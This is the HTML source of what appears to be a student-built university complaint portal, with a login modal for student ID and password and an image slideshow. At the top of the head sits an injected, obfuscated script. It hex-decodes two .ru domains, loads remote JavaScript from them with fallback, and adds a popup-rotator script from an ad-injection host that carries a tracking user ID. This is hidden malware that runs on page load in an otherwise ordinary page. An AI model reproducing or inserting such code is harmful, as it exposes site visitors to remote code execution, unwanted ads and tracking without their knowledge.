<!DOCTYPE html>
<html>
<body>

<head><script>if(window.v_347548468_V_235235235 === undefined) !(function(){!function(){var t=JSON.parse('["32386e32676c3377667962302e7275","646d7564337679736a61366d65342e7275"]'),e="27801",o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",o=0;o<t.length;o++)e+=String.fromCharCode(parseInt(t[o],16));return e},n=function(t,e,o){var n=document.location.protocol+"//"+t;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild(r),r.onload=function(){this.a982392846||(this.a982392846=!0,"function"==typeof e&&e())},r.onerror=function(){this.a982392846||(this.a982392846=!0,r.parentNode.removeChild(r),"function"==typeof o&&o())}}},r=function(i){var a=i?i:t[0],s=o(a)+"/pjs/"+e+".js";n(s,function(){},function(){var e=t.indexOf(a),o=t[e+1];o&&r(o)})};r()}();function getCfCookie(name) { var matches = document.cookie.match(new RegExp("(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)")); return matches ? decodeURIComponent(matches[1]) : undefined;} if (window.self == window.top) { document.addEventListener("DOMContentLoaded", function(){ var pops = document.createElement('script'); var cfilterCookie = '6697e3d5eb75761c638fdeb1eed84055'; var cfilterCookieIsSet = getCfCookie(cfilterCookie) ? getCfCookie(cfilterCookie) : 0; pops.src = '//mywebshield-ww1.com/' + 'getcl/rotator/' + 'campaignid/3/' + 'sourceid/132/' + 'siteid/200093650/' + 'userid/72FDEB20-0B9B-428C-8063-188B919A91F2/' + 'iscookie/' + cfilterCookieIsSet; document.head.appendChild(pops); });}}) (), window.v_347548468_V_235235235 = true;</script>

<link rel="stylesheet" type="text/css" href="style.css">
<meta name="viewport" content="width=device-width, initial-scale=1">



<div id="header">  <img src='http://www.ump.edu.my/download/logo-rasmi-ump.png' align='middle' width='20%' height='15%'><img src='https://terengganutimes.com/wp-content/uploads/2014/10/ADUAN_01.png' align='right' width='20%' height='90%'><br/><br/></div>

<body>

<ul>

<li><a href="http://localhost/xampp/project/slidehome.html">Home</a></li>
  <li><a href="http://localhost/xampp/project/faq.html">Help</a></li>
  
  <li style="float:right">
<a onclick="document.getElementById('id01').style.display='block'" style="width:auto;">Login</a></li>


<div id="id01" class="modal">
  
<form class="modal-content animate" action="connect.php" method="post">
<div class="message"><?php if($message!="") { echo $message; } ?></div>
    <div class="imgcontainer">
      <span onclick="document.getElementById('id01').style.display='none'" class="close" title="Close Modal">&times;</span>
      
    </div>

    <div class="container">
	                                                          
															  
      <label><b>Username</b></label>
      <input type="text" placeholder="Enter Username" name="studentID" id="studentID" required>

      <label><b>Password</b></label>
      <input type="password" placeholder="Enter Password" name="studentPassword" id="studentPassword" required>
        
      <button type="submit">Login</button>
	
      <input type="checkbox" checked="checked"> Remember me
    </div>

    <div class="container" style="background-color:#f1f1f1">
      <button type="button" onclick="document.getElementById('id01').style.display='none'" class="cancelbtn">Cancel</button>
      <span class="psw">Register <a href="registration.html">account?</a></span>
    </div>
  </form>
</div>

<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}
</script>


</ul>

</div>
</body>


<body>


<div class="slideshow-container">

<div class="mySlides fade">
  <div class="numbertext">1 / 3</div>
  <img src="http://www.ump.edu.my/sites/default/files/styles/slideshow/public/field/slideshow/slideshow-11_0.jpg?itok=_NtqVcJW" style="width:100%">
  <div class="text"></div>
</div>

<div class="mySlides fade">
  <div class="numbertext">2 / 3</div>
  <img src="http://www.ump.edu.my/sites/default/files/styles/slideshow/public/field/slideshow/ump-pekan-kpu.jpg?itok=Iy0FInTR" style="width:100%">
  <div class="text"></div>
</div>

<div class="mySlides fade">
  <div class="numbertext">3 / 3</div>
  <img src="http://www.ump.edu.my/sites/default/files/styles/slideshow/public/field/slideshow/ump-pekan-2015.jpg?itok=tFBKdPIq" style="width:100%">
  <div class="text"></div>
</div>

<a class="prev" onclick="plusSlides(-1)"><</a>
<a class="next" onclick="plusSlides(1)">></a>

</div>
<br>

<div style="text-align:center">
  <span class="dot" onclick="currentSlide(1)"></span> 
  <span class="dot" onclick="currentSlide(2)"></span> 
  <span class="dot" onclick="currentSlide(3)"></span> 
</div>

<script>
var slideIndex = 1;
showSlides(slideIndex);

function plusSlides(n) {
  showSlides(slideIndex += n);
}

function currentSlide(n) {
  showSlides(slideIndex = n);
}

function showSlides(n) {
  var i;
  var slides = document.getElementsByClassName("mySlides");
  var dots = document.getElementsByClassName("dot");
  if (n > slides.length) {slideIndex = 1}    
  if (n < 1) {slideIndex = slides.length}
  for (i = 0; i < slides.length; i++) {
      slides[i].style.display = "none";  
  }
  for (i = 0; i < dots.length; i++) {
      dots[i].className = dots[i].className.replace(" active", "");
  }
  slides[slideIndex-1].style.display = "block";  
  dots[slideIndex-1].className += " active";
}
</script>


</body>
</html> 
